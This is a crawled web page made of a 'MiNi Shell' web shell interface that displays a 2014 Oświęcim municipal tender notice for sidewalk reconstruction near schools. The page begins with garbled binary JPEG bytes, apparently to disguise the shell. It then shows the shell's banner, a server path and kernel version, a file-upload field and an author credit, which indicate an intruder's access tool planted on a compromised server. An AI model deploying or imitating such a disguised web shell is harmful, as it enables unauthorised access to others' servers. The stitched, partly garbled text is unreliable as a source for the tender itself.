JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140411/125210-N-2014.html

<p class="kh_header"><b>Oświęcim: Przebudowa chodników wewnątrzosiedlowych w Oświęcimiu zlokalizowanych przy:
1) budynku wielomieszkaniowym ozn. Budowlanych 31-35,
2) ul. Kalicińskiego, pomiędzy ogrodzeniem Szkoły Podstawowej nr 5a Niepublicznym Przedszkolem Promyczek,
3) ul. Broniewskiego, obok placu zabaw przy Szkole Podstawowej nr 4</b><br>
<b>Numer ogłoszenia: 125210 - 2014; data zamieszczenia: 11.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Oświęcim , ul.Zaborska 2, 32-600 Oświęcim, woj. małopolskie, tel. 033 8429311,8429311, faks 033 8429199.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.oswiecim.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa chodników wewnątrzosiedlowych w Oświęcimiu zlokalizowanych przy:
1) budynku wielomieszkaniowym ozn. Budowlanych 31-35,
2) ul. Kalicińskiego, pomiędzy ogrodzeniem Szkoły Podstawowej nr 5a Niepublicznym Przedszkolem Promyczek,
3) ul. Broniewskiego, obok placu zabaw przy Szkole Podstawowej nr 4.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia, o którym mowa w ust. 1 polega na przebudowie chodników poprzez zmianę nawierzchni na kostkę betonową, a w przypadku ul. Budowlanych na poszerzeniu chodnika. Zamawiający dopuszcza możliwość składania ofert częściowych.
Część I zamówienia - dla chodnika położonego przy budynku wielomieszkaniowym ozn. Budowlanych 31-35: 
remont istniejącego chodnika w zakresie wymiany nawierzchni i konstrukcji oraz budowę utwardzenia terenu. Szerokość chodnika wraz z utwardzeniem terenu zaprojektowano o szerokości 3m oraz 1,5m (w miejscach dojścia do budynku). Spadki poprzeczne należy wykonać o wartości 2% w stronę zieleni. Nawierzchnię należy wykonać z betonowej kostki brukowej gr. 8cm kolor czerwony oraz szary (w miejscach dojścia do budynku). Chodnik wraz z utwardzeniem terenu należy obramować obrzeżem betonowym o wymiarach 8x30x100cm ułożonym na ławie betonowej z oporem -beton C12/15. Połączenie krawędzi chodnika i utwardzenia terenu z jezdnią należy wykonać za krawężnika betonowego najazdowego wibroprasowanego o wymiarach 15x22x100cm ułożonego na podsypce cementowo - piaskowej 1:4 o grubości 3cm  opartego na ławie betonowej z oporem - beton C12/15. Odkrycie krawężnika zaprojektowano na wysokość 3cm w stosunku do wysokości jezdni. Przecięcie krawędzi jezdni z chodnikiem oraz utwardzeniem terenu należy wykonać za pomocą łuków kołowych o promieniu 3m. Szerokość remontowanego chodnika wraz z utwardzeniem nawiązuje do istniejącej jezdni przy budynku nr 19-23 ul. Budowlanych oraz umożliwia przejazd pojazdom służb ratunkowych;
stojaki na rowery należy zamontować poza obrys projektowanego utwardzenia terenu. Ławkę należy ulokować w rejonie istniejącej piaskownicy.
Zakres prac polega na:
- rozebraniu istniejącej nawierzchni chodnika;
- rozebraniu istniejących stojaków na rowery oraz ławki;
- rozebraniu obrzeży;
- rozebraniu istniejących warstw podbudowy wraz z korytowaniem;
- ułożeniu obrzeży;
- wykonaniu podbudowy;
- montażu stojaków na rowery oraz ławki;
- wykonaniu nawierzchni utwardzenia terenu oraz chodnika.
Część II zamówienia - dla chodnika położonego przy ul. Kalicińskiego, pomiędzy ogrodzeniem Szkoły Podstawowej nr 5 a Niepublicznym Przedszkolem Promyczek:
remont istniejącego chodnika w zakresie wymiany nawierzchni, konstrukcji, obramowania oraz elementów odwodnienia. Chodnik należy wykonać o szerokości 3m ze spadkiem poprzecznym o wartości 2%. Nawierzchnię należy wykonać z betonowej kostki brukowej gr. 8cm kolor szary. Chodnik należy obramować obrzeżem betonowym o wymiarach 8x30x100cm ułożonym na ławie betonowej z oporem - beton C12/15. W miejscu zaznaczonym na planie sytuacyjnym wzdłuż krawędzi chodnika wykonać remont (wymiana uszkodzonych, regulacja wysokościowa) betonowych korytek o wymiarach 60x22x10 ułożonych na zaprawie cementowo-piaskowej 1:3 o grubości 3cm.
W celu sprawnego odprowadzenia wody z jezdni przewiduje się remont wpustu kanalizacji deszczowej wraz z przykanalikiem. Wpust należy wykonać jako betonowy fi 500.  Wpust deszczowy przewidziano wykonać z osadnikiem szlamu o głębokości 0,8m. Przewiduje się podłączyć przykanalikiem fi 200 do istniejącej w terenie studni  kanalizacji deszczowej. 
Stosować rury kanalizacyjne o połączeniach z wydłużonym kielichem, uszczelnionych uszczelką gumową. Przy montażu złączy kielichowych należy zwracać uwagę na czystość końcówek rur, prawidłowe umieszczenie uszczelek w kielichach oraz liniowość  i projektowany spadek kanalizacji. Podłączenie do istniejących studni wykonać jako szczelne;
do realizacji przedmiotowego przedsięwzięcia winne być zastosowane materiały i wyroby budowlane umożliwiające prawidłowe działanie  systemu kanalizacyjnego. Wszystkie zastosowane materiały i wyroby winny być wolne od wad fabrycznych, posiadać długą żywotność oraz odpowiednie atesty, deklaracje zgodności.
Inwestycja wymaga również remontu słupków bezpieczeństwa zlokalizowanych w rejonie punktu B;
w miejscu zaznaczonym na planie sytuacyjnym należy zamontować kosze na śmieci.
Zakres prac polega na:
- rozebraniu istniejącej nawierzchni chodnika;
- rozebraniu obrzeży;
- rozebraniu wpustu deszczowego;
- rozebraniu istniejących warstw podbudowy wraz z korytowaniem;
- rozebraniu słupków bezpieczeństwa;
- zabudowie wpustu deszczowego;
- montażu słupków U-12c;
- ułożeniu obrzeży obramowujących chodnik;
- ułożeniu korytek betonowych;
- wykonaniu podbudowy;
- montażu 2 koszy na śmieci;
- wykonaniu nawierzchni chodnika.
Część III zamówienia - dla chodnika położonego przy ul. Broniewskiego, obok placu zabaw przy Szkole Podstawowej nr 4: 
remont istniejącego chodnika w zakresie wymiany nawierzchni, konstrukcji oraz obramowania. Chodnik należy wykonać o szerokości 1,5m ze spadkiem poprzecznym o wartości 2%. Nawierzchnię należy wykonać z betonowej kostki brukowej gr. 8cm kolor szary. Chodnik należy obramować obrzeżem betonowym o wymiarach 8x30x100cm ułożonym na ławie betonowej z oporem - beton C12/15. Krawędzie przecięcia się chodników należy wykonać za pomocą skosów 1:1 oraz łuków o promieniu 5m;
zakres prac polega na:
- rozebraniu istniejącej nawierzchni chodnika;- rozebraniu obrzeży;
- rozebraniu istniejących warstw podbudowy wraz z korytowaniem;
- ułożeniu obrzeży;
- wykonaniu podbudowy;
- wykonaniu nawierzchni chodnika..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1, 45.11.12.00-0, 45.23.32.60-9, 77.31.41.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w przedmiotowym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań w zakresie spełnienia warunku dotyczącego posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Zamawiający uzna warunek za spełniony na podstawie oświadczenia wykonawcy złożonego wg wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań w zakresie spełnienia warunku  w zakresie posiadania wiedzy i doświadczenia. Zamawiający uzna warunek za spełniony na podstawie oświadczenia wykonawcy złożonego wg wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań w zakresie spełnienia warunku dotyczącego dysponowania odpowiednim potencjałem technicznym. Zamawiający uzna warunek za spełniony na podstawie oświadczenia wykonawcy złożonego wg wzoru stanowiącego załącznik   nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań w zakresie spełnienia warunku dotyczącego dysponowania osobami zdolnymi do wykonania zamówienia. Zamawiający uzna warunek za spełniony na podstawie oświadczenia wykonawcy złożonego wg wzoru stanowiącego załącznik   nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań w zakresie spełnienia warunku dotyczącego sytuacji ekonomicznej i finansowej. Zamawiający uzna warunek za spełniony na podstawie oświadczenia Wykonawcy złożonego wg wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie treści art. 144 ustawy Pzp zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, za wyjątkiem przypadków określonych w niniejszej specyfikacji w tym: 
zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub rozliczenie wynagrodzenia, np. zmiana wysokości podatku VAT;
z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach. Strony za okoliczności siły wyższej uznają: powódź, trzęsienie ziemi, huragany, deszcze nawalne, upadek statku powietrznego, działania wojenne lub ogłoszenie stanu wojennego, strajk ogólnokrajowy lub  ogłoszony stan klęski żywiołowej;
z powodu działań osób trzecich uniemożliwiających wykonanie robót i prac, które to działania nie są konsekwencją winy którejkolwiek ze stron;
zmiany terminu wykonania przedmiotu zamówienia w przypadku wystąpienia niesprzyjających warunków atmosferycznych lub przyczyn technologicznych powodujących konieczność całkowitego przerwania prac, co zostanie potwierdzone przez inspektora nadzoru;
zmiany terminu wykonania przedmiotu zamówienia w przypadku wystąpienia zamówień dodatkowych niezbędnych do prawidłowego wykonania zamówienia podstawowego, których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia i które mają wpływ na termin realizacji zamówienia;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.oswiecim.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Oświęcim, Wydział Zamówień Publicznych, ul Solskiego 2 pok.11, 32-600 Oświęcim.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2014 godzina 10:00, miejsce: Urząd Miasta Oświęcim, ul. Zaborska 2 pok. 01, 32-600 Oświęcim.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przebudowa chodniku wewnątrzosiedlowego zlokalizowanego przy budynku wielomieszkaniowym ozn. Budowlanych 31-35.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> remont istniejącego chodnika w zakresie wymiany nawierzchni i konstrukcji oraz budowę utwardzenia terenu. Szerokość chodnika wraz z utwardzeniem terenu zaprojektowano o szerokości 3m oraz 1,5m (w miejscach dojścia do budynku). Spadki poprzeczne należy wykonać o wartości 2% w stronę zieleni. Nawierzchnię należy wykonać z betonowej kostki brukowej gr. 8cm kolor czerwony oraz szary (w miejscach dojścia do budynku). Chodnik wraz z utwardzeniem terenu należy obramować obrzeżem betonowym o wymiarach 8x30x100cm ułożonym na ławie betonowej z oporem -beton C12/15. Połączenie krawędzi chodnika i utwardzenia terenu z jezdnią należy wykonać za krawężnika betonowego najazdowego wibroprasowanego o wymiarach 15x22x100cm ułożonego na podsypce cementowo - piaskowej 1:4 o grubości 3cm  opartego na ławie betonowej z oporem - beton C12/15. Odkrycie krawężnika zaprojektowano na wysokość 3cm w stosunku do wysokości jezdni. Przecięcie krawędzi jezdni z chodnikiem oraz utwardzeniem terenu należy wykonać za pomocą łuków kołowych o promieniu 3m. Szerokość remontowanego chodnika wraz z utwardzeniem nawiązuje do istniejącej jezdni przy budynku nr 19-23 ul. Budowlanych oraz umożliwia przejazd pojazdom służb ratunkowych;
stojaki na rowery należy zamontować poza obrys projektowanego utwardzenia terenu. Ławkę należy ulokować w rejonie istniejącej piaskownicy.
Zakres prac polega na:
- rozebraniu istniejącej nawierzchni chodnika;
- rozebraniu istniejących stojaków na rowery oraz ławki;
- rozebraniu obrzeży;
- rozebraniu istniejących warstw podbudowy wraz z korytowaniem;
- ułożeniu obrzeży;
- wykonaniu podbudowy;
- montażu stojaków na rowery oraz ławki;
- wykonaniu nawierzchni utwardzenia terenu oraz chodnika..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1, 45.11.12.00-0, 45.23.24.00-6, 45.23.32.60-9, 77.31.41.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przebudowa chodniku wewnątrzosiedlowego zlokalizowanego przy ul. Kalicińskiego, pomiędzy ogrodzeniem Szkoły Podstawowej nr 5
a Niepublicznym Przedszkolem Promyczek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> remont istniejącego chodnika w zakresie wymiany nawierzchni, konstrukcji, obramowania oraz elementów odwodnienia. Chodnik należy wykonać o szerokości 3m ze spadkiem poprzecznym o wartości 2%. Nawierzchnię należy wykonać z betonowej kostki brukowej gr. 8cm kolor szary. Chodnik należy obramować obrzeżem betonowym o wymiarach 8x30x100cm ułożonym na ławie betonowej z oporem - beton C12/15. W miejscu zaznaczonym na planie sytuacyjnym wzdłuż krawędzi chodnika wykonać remont (wymiana uszkodzonych, regulacja wysokościowa) betonowych korytek o wymiarach 60x22x10 ułożonych na zaprawie cementowo-piaskowej 1:3 o grubości 3cm.
W celu sprawnego odprowadzenia wody z jezdni przewiduje się remont wpustu kanalizacji deszczowej wraz z przykanalikiem. Wpust należy wykonać jako betonowy fi 500.  Wpust deszczowy przewidziano wykonać z osadnikiem szlamu o głębokości 0,8m. Przewiduje się podłączyć przykanalikiem fi 200 do istniejącej w terenie studni  kanalizacji deszczowej. 
Stosować rury kanalizacyjne o połączeniach z wydłużonym kielichem, uszczelnionych uszczelką gumową. Przy montażu złączy kielichowych należy zwracać uwagę na czystość końcówek rur, prawidłowe umieszczenie uszczelek w kielichach oraz liniowość  i projektowany spadek kanalizacji. Podłączenie do istniejących studni wykonać jako szczelne;
do realizacji przedmiotowego przedsięwzięcia winne być zastosowane materiały i wyroby budowlane umożliwiające prawidłowe działanie  systemu kanalizacyjnego. Wszystkie zastosowane materiały i wyroby winny być wolne od wad fabrycznych, posiadać długą żywotność oraz odpowiednie atesty, deklaracje zgodności.
Inwestycja wymaga również remontu słupków bezpieczeństwa zlokalizowanych w rejonie punktu B;
w miejscu zaznaczonym na planie sytuacyjnym należy zamontować kosze na śmieci.
Zakres prac polega na:
- rozebraniu istniejącej nawierzchni chodnika;
- rozebraniu obrzeży;
- rozebraniu wpustu deszczowego;
- rozebraniu istniejących warstw podbudowy wraz z korytowaniem;
- rozebraniu słupków bezpieczeństwa;
- zabudowie wpustu deszczowego;
- montażu słupków U-12c;
- ułożeniu obrzeży obramowujących chodnik;
- ułożeniu korytek betonowych;
- wykonaniu podbudowy;
- montażu 2 koszy na śmieci;
- wykonaniu nawierzchni chodnika..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1, 45.11.12.00-0, 45.23.24.00-6, 45.23.32.60-9, 77.31.41.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przebudowa chodniku wewnątrzosiedlowego zlokalizowanego przy
ul. Broniewskiego, obok placu zabaw przy Szkole Podstawowej nr 4..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> remont istniejącego chodnika w zakresie wymiany nawierzchni, konstrukcji oraz obramowania. Chodnik należy wykonać o szerokości 1,5m ze spadkiem poprzecznym o wartości 2%. Nawierzchnię należy wykonać z betonowej kostki brukowej gr. 8cm kolor szary. Chodnik należy obramować obrzeżem betonowym o wymiarach 8x30x100cm ułożonym na ławie betonowej z oporem - beton C12/15. Krawędzie przecięcia się chodników należy wykonać za pomocą skosów 1:1 oraz łuków o promieniu 5m;
zakres prac polega na:
- rozebraniu istniejącej nawierzchni chodnika;- rozebraniu obrzeży;
- rozebraniu istniejących warstw podbudowy wraz z korytowaniem;
- ułożeniu obrzeży;
- wykonaniu podbudowy;
- wykonaniu nawierzchni chodnika..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1, 45.11.12.00-0, 45.23.24.00-6, 45.23.32.60-9, 77.31.41.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com